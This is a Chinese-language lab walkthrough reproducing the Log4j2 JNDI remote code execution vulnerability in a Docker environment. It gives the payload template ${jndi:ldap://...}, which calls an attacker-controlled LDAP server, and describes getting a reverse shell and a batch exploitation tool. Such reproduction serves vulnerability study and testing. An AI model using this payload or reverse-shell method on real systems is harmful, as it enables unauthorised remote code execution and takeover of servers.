漏洞描述
Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。Spring-Boot-strater-log4j2、Apache Struts2、Apache Solr、Apache Flink、Apache Druid、ElasticSearch、Flume、Dubbo、Redis、Logstash、Kafka均受影响。
影响范围:
Apache Log4j 2.x < 2.15.0-rc2
漏洞复现:
使用Log4j2漏洞环境进行复现,环境下载地址:https://github.com/fengxuangit/log4j_vuln
docker创建环境命令:
docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker exec -it log4j_vuln_container /bin/bash /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
使用本地kali服务器docker拉取环境。
环境启动成功后,访问http://127.0.0.1/webstudy/hello-fengxuan,漏洞post参数为c。
漏洞环境部署完毕,开始漏洞复现。首先需要一台公网vps(起ldap服务、接受反弹shell)。
vps起ldap服务,工具地址:https://github.com/feihong-cs/JNDIExploit(好多复现过程中遇到jdk版本不加载恶意类的情况,导致漏洞无法复现,github有能生成能绕过JDK限制JNDI链接的工具,大家可以使用试试)。
ldap服务启动之后,去抓包发送payload,把要执行的命令base64加密后放入payload中。
先创建一个文件touch /tmp/123 发送payload。
payload为 ${jndi:ldap://x:x:x:x:1389/Basic/Command/base64/base64命令}
vps上的 JNDIExploit监听已经接收到了恶意请求。
查看docker镜像/tmp路径,123文件创建成功。
反弹shell同理,将反弹shell命令base64加密后放入payload发送。
反弹shell成功。
最后附一款GUI工具,项目地址:GitHub - inbug-team/Log4j_RCE_Tool: Log4j 多线程批量检测利用工具
